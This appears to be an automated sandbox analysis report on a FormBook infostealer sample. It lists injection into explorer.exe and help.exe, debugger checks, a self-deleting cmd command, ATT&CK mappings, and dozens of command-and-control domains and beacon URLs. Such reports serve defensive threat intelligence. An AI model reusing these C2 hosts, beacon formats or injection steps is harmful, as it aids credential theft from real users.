Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]	2_2_03846C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]	2_2_03846C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]	2_2_03846C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]	2_2_03846C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C58EC mov eax, dword ptr fs:[00000030h]	2_2_037C58EC
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]	2_2_03847016
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]	2_2_03847016
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]	2_2_03847016
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03894015 mov eax, dword ptr fs:[00000030h]	2_2_03894015
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03894015 mov eax, dword ptr fs:[00000030h]	2_2_03894015
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FF0BF mov ecx, dword ptr fs:[00000030h]	2_2_037FF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FF0BF mov eax, dword ptr fs:[00000030h]	2_2_037FF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FF0BF mov eax, dword ptr fs:[00000030h]	2_2_037FF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385C450 mov eax, dword ptr fs:[00000030h]	2_2_0385C450
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385C450 mov eax, dword ptr fs:[00000030h]	2_2_0385C450
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]	2_2_037F20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D849B mov eax, dword ptr fs:[00000030h]	2_2_037D849B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03882073 mov eax, dword ptr fs:[00000030h]	2_2_03882073
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9080 mov eax, dword ptr fs:[00000030h]	2_2_037C9080
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03891074 mov eax, dword ptr fs:[00000030h]	2_2_03891074

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Code function: 0_2_0038ACE0 LdrLoadDll,

0_2_0038ACE0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.lipcarehub.africa
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ecoskiusa.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Section unmapped: C:\Windows\SysWOW64\help.exe base address: B50000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Thread register set: target process: 3320			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3320			Jump to behavior

Source: C:\Windows\SysWOW64\help.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"

Jump to behavior

Source: explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.247877319.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000001.00000002.515728558.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.253308197.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.256946409.0000000007B83000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.247356405.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.510164477.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.247877319.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match	File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match	File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	1 Input Capture	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
S22Ls0H4Sz.exe	79%	ReversingLabs	Win32.Trojan.FormBook
S22Ls0H4Sz.exe	62%	Virustotal		Browse
S22Ls0H4Sz.exe	100%	Avira	TR/Crypt.ZPACK.Gen
S22Ls0H4Sz.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.S22Ls0H4Sz.exe.380000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.2.S22Ls0H4Sz.exe.380000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.ecoskiusa.com/dr62/	0%	Avira URL Cloud	safe
http://www.ctjhxv3.vip	0%	Avira URL Cloud	safe
http://www.beginagainmen.comReferer:	0%	Avira URL Cloud	safe
http://www.lipcarehub.africa	0%	Avira URL Cloud	safe
http://www.573415.com/dr62/	0%	Avira URL Cloud	safe
http://www.ecoskiusa.comReferer:	0%	Avira URL Cloud	safe
http://www.ecoskiusa.com	0%	Avira URL Cloud	safe
http://www.anastaciachetty.comReferer:	0%	Avira URL Cloud	safe
http://www.jingduxueyue.site	0%	Avira URL Cloud	safe
http://www.rodeosonline.uk/dr62/www.ecoskiusa.com	0%	Avira URL Cloud	safe
http://www.lipcarehub.africa/dr62/	0%	Avira URL Cloud	safe
http://www.pilcoh.onlineReferer:	0%	Avira URL Cloud	safe
http://www.85putao.com	0%	Avira URL Cloud	safe
http://www.alacatimacunu.com	0%	Avira URL Cloud	safe
http://www.573415.com	0%	Avira URL Cloud	safe
http://www.myenergyusage.co.ukReferer:	0%	Avira URL Cloud	safe
http://www.engagementbuzz.com/dr62/www.raffletokens.com	0%	Avira URL Cloud	safe
http://www.bathroadtraders.co.uk/dr62/www.alacatimacunu.com	100%	Avira URL Cloud	malware
http://www.lipcarehub.africa/dr62/www.anastaciachetty.com	0%	Avira URL Cloud	safe
http://www.engagementbuzz.com/dr62/	0%	Avira URL Cloud	safe
http://www.ecoskiusa.com/dr62/www.lipcarehub.africa	0%	Avira URL Cloud	safe
http://www.raffletokens.comReferer:	0%	Avira URL Cloud	safe
http://www.lipcarehub.africaReferer:	0%	Avira URL Cloud	safe
http://www.raffletokens.com/dr62/	0%	Avira URL Cloud	safe
http://www.85putao.com/dr62/	100%	Avira URL Cloud	malware
http://www.anastaciachetty.com/dr62/	0%	Avira URL Cloud	safe
http://www.beginagainmen.com/dr62/	0%	Avira URL Cloud	safe
http://www.g-labs.one/dr62/	0%	Avira URL Cloud	safe
www.573415.com/dr62/	0%	Avira URL Cloud	safe
http://www.ecoskiusa.com/dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv	0%	Avira URL Cloud	safe
http://www.85putao.com/dr62/www.engagementbuzz.com	100%	Avira URL Cloud	malware
http://www.ctjhxv3.vipReferer:	0%	Avira URL Cloud	safe
http://www.alacatimacunu.com/dr62/www.g-labs.one	0%	Avira URL Cloud	safe
http://www.g-labs.one	0%	Avira URL Cloud	safe
http://www.jingduxueyue.siteReferer:	0%	Avira URL Cloud	safe
http://www.myenergyusage.co.uk/dr62/www.jingduxueyue.site	100%	Avira URL Cloud	malware
http://www.rodeosonline.ukReferer:	0%	Avira URL Cloud	safe
http://www.bathroadtraders.co.uk/dr62/	100%	Avira URL Cloud	malware
http://www.pilcoh.online/dr62/www.573415.com	100%	Avira URL Cloud	malware
http://www.573415.com/dr62/www.beginagainmen.com	0%	Avira URL Cloud	safe
http://www.ctjhxv3.vip/dr62/	0%	Avira URL Cloud	safe
http://www.pilcoh.online	100%	Avira URL Cloud	malware
http://www.jingduxueyue.site/dr62/	0%	Avira URL Cloud	safe
http://www.rodeosonline.uk	0%	Avira URL Cloud	safe
http://www.myenergyusage.co.uk/dr62/	100%	Avira URL Cloud	malware
http://www.alacatimacunu.comReferer:	0%	Avira URL Cloud	safe
http://www.g-labs.oneReferer:	0%	Avira URL Cloud	safe
http://www.anastaciachetty.com	0%	Avira URL Cloud	safe
http://www.myenergyusage.co.uk	0%	Avira URL Cloud	safe
http://www.raffletokens.com	0%	Avira URL Cloud	safe
http://www.573415.comReferer:	0%	Avira URL Cloud	safe
http://www.pilcoh.online/dr62/	100%	Avira URL Cloud	malware
http://www.raffletokens.com/dr62/www.pilcoh.online	0%	Avira URL Cloud	safe
http://www.beginagainmen.com	0%	Avira URL Cloud	safe
http://www.bathroadtraders.co.uk	0%	Avira URL Cloud	safe
http://www.ctjhxv3.vip/dr62/www.myenergyusage.co.uk	0%	Avira URL Cloud	safe
http://www.bathroadtraders.co.ukReferer:	0%	Avira URL Cloud	safe
http://www.anastaciachetty.com/dr62/www.85putao.com	0%	Avira URL Cloud	safe
http://www.rodeosonline.uk/dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv	0%	Avira URL Cloud	safe
http://www.rodeosonline.uk/dr62/	0%	Avira URL Cloud	safe
http://www.engagementbuzz.comReferer:	0%	Avira URL Cloud	safe
http://www.jingduxueyue.site/dr62/www.bathroadtraders.co.uk	0%	Avira URL Cloud	safe
http://www.alacatimacunu.com/dr62/	0%	Avira URL Cloud	safe
http://www.engagementbuzz.com	0%	Avira URL Cloud	safe
http://www.beginagainmen.com/dr62/www.ctjhxv3.vip	0%	Avira URL Cloud	safe
http://www.85putao.comReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ecoskiusa.com	34.102.136.180	true	false	unknown
www.rodeosonline.uk	199.59.243.223	true	true	unknown
www.lipcarehub.africa	unknown	unknown	true	unknown
www.ecoskiusa.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.573415.com/dr62/	true	Avira URL Cloud: safe	low
http://www.ecoskiusa.com/dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv	false	Avira URL Cloud: safe	unknown
http://www.rodeosonline.uk/dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ctjhxv3.vip	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beginagainmen.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ecoskiusa.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lipcarehub.africa	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.anastaciachetty.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rodeosonline.uk/dr62/www.ecoskiusa.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.573415.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lipcarehub.africa/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ecoskiusa.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jingduxueyue.site	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ecoskiusa.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pilcoh.onlineReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.85putao.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bathroadtraders.co.uk/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lipcarehub.africa/dr62/www.anastaciachetty.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bathroadtraders.co.uk/dr62/www.alacatimacunu.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.myenergyusage.co.ukReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	explorer.exe, 00000001.00000002.523897898.0000000013CBF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000002.00000002.512081375.00000000041BF000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.alacatimacunu.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.engagementbuzz.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.engagementbuzz.com/dr62/www.raffletokens.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.573415.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ecoskiusa.com/dr62/www.lipcarehub.africa	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.raffletokens.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lipcarehub.africaReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.raffletokens.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.anastaciachetty.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.85putao.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.pilcoh.online/dr62/www.573415.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.g-labs.one/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beginagainmen.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.85putao.com/dr62/www.engagementbuzz.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alacatimacunu.com/dr62/www.g-labs.one	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ctjhxv3.vipReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.256946409.0000000007A84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517521328.0000000007A84000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.g-labs.one	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jingduxueyue.siteReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rodeosonline.ukReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myenergyusage.co.uk/dr62/www.jingduxueyue.site	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.573415.com/dr62/www.beginagainmen.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pilcoh.online	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ctjhxv3.vip/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rodeosonline.uk	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jingduxueyue.site/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myenergyusage.co.uk/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.anastaciachetty.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alacatimacunu.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.g-labs.oneReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myenergyusage.co.uk	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pilcoh.online/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.raffletokens.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.raffletokens.com/dr62/www.pilcoh.online	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.573415.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bathroadtraders.co.uk	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beginagainmen.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ctjhxv3.vip/dr62/www.myenergyusage.co.uk	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.anastaciachetty.com/dr62/www.85putao.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bathroadtraders.co.ukReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jingduxueyue.site/dr62/www.bathroadtraders.co.uk	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rodeosonline.uk/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.engagementbuzz.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.85putao.comReferer:	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
